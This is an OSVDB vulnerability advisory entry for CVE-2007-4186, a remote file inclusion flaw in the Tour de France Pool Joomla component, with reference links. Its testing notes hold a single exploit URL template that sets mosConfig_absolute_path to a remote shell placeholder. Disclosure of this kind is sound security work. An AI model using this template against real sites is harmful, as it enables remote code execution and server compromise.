Tour de France Pool for Joomla! (com_tour_toto) admin.tour_toto.php mosConfig_absolute_path Variable Remote File Inclusion

2007-08-02T00:00:00
ID OSVDB:39059
Type osvdb
Reporter OSVDB
Modified 2007-08-02T00:00:00

Description

Manual Testing Notes

http://[target]/path/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=sHELL?

References:

Other Advisory URL: http://yollubunlar.org/our-de-france-pool-101-remote-file-include-43.html Other Advisory URL: http://securityreason.com/securityalert/2979 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0026.html ISS X-Force ID: 35779 CVE-2007-4186 Bugtraq ID: 25183